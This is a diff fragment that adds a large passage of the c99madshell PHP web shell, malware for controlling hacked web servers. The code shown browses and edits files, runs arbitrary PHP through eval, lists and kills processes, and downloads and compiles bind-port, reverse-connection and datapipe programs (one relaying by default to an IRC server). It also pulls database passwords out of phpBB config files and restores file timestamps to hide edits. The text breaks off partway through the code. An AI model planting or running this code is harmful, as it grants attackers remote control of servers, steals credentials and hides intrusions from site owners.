+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)){$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='d';document.todo.d.value='".$uv."';document.todo.submit();\">I</a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='info';document.todo.d.value='".$ud."';document.todo.submit();\">I</a>&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='edit';document.todo.d.value='".$ud."';document.todo.submit();\">E</a>&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='download';document.todo.d.value='".$ud."';document.todo.submit();\">D</a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  //Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 0;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 0;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(1);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(0);\" value=\"Unselect all\"><b>";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+if ($act == "tools")
+{
+ $bndportsrcs = array(
+  "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+  "c99sh_bindport.c"=>array("Using C","%path %port %pass")
+ );
+ $bcsrcs = array(
+  "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+  "c99sh_backconn.c"=>array("Using C","%path %host %port")
+ );
+ $dpsrcs = array(
+  "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
+  "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
+ );
+ if (!is_array($bind)) {$bind = array();}
+ if (!is_array($bc)) {$bc = array();}
+ if (!is_array($datapipe)) {$datapipe = array();}
+
+ if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
+ if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
+
+ if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
+ if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
+
+ if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
+ if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
+ if (!empty($bindsubmit))
+ {
+  echo "<b>Result of binding port:</b><br>";
+  $v = $bndportsrcs[$bind["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $w = explode(".",$bind["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%port",$bind["port"],$v[1]);
+    $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
+    else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.grep.value='".basename($binpath)."';document.todo.submit();\"><u>View binder's process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ if (!empty($bcsubmit))
+ {
+  echo "<b>Result of back connection:</b><br>";
+  $v = $bcsrcs[$bc["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  else
+  {
+   $w = explode(".",$bc["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%host",$bc["host"],$v[1]);
+    $v[1] = str_replace("%port",$bc["port"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
+   }
+  }
+ }
+ if (!empty($dpsubmit))
+ {
+  echo "<b>Result of datapipe-running:</b><br>";
+  $v = $dpsrcs[$datapipe["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $srcpath = $tmpdir.$datapipe["src"];
+   $w = explode(".",$datapipe["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
+    $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
+    $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
+    else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.grep.value='".basename($binpath)."';document.todo.submit();\"><u>View datapipe process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ ?><b>Binding port:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
+ foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+ ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
+<b>Back connection:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+<b>Datapipe:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
+foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
+}
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."a\"';document.todo.submit();\">!</a>";}
+  else {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."d\"';document.todo.submit();\">!</a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$i.$parsesort[1]."';document.todo.submit();\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+        {
+         echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.d.value='".urlencode($d)."';document.todo.pid.value='".$line[1]."';document.todo.sig.value='9';document.todo.submit();\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
+   while (ereg("                ",$ret)) {$ret = str_replace("                ","        ",$ret);}
+   while (ereg("         ",$ret)) {$ret = str_replace("         ","        ",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("        ",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+
+   if ($parsesort[1] != "a") {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."a\"';document.todo.submit();\">!</a>";}
+   else {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."d\"';document.todo.submit();\">!</a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$i.$parsesort[1]."a\"';document.todo.submit();\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("        ",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024;
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='edit';document.todo.c.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("DIZ","info"),
+   array("HTML","html"),
+   array("TXT","txt"),
+   array("Code","code"),
+   array("Session","phpsess"),
+   array("EXE","exe"),
+   array("SDB","sdb"),
+   array("INI","ini"),
+   array("DOWNLOAD","download"),
+   array("RTF","notepad"),
+   array("EDIT","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".$t[0]."</b></a>";}
+   echo " |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.f.value='".urlencode($f)."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.fullhexdump.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Full</a>] [<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='2';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='3';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='4';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($dbuser)."';document.sql.sql_passwd.value='".htmlspecialchars($dbpasswd)."';document.sql.sql_server.value='".htmlspecialchars($dbhost)."';document.sql.sql_port.value='3306';document.sql.sql_db.value='".htmlspecialchars($dbname)."';document.sql.submit();\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99madshell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
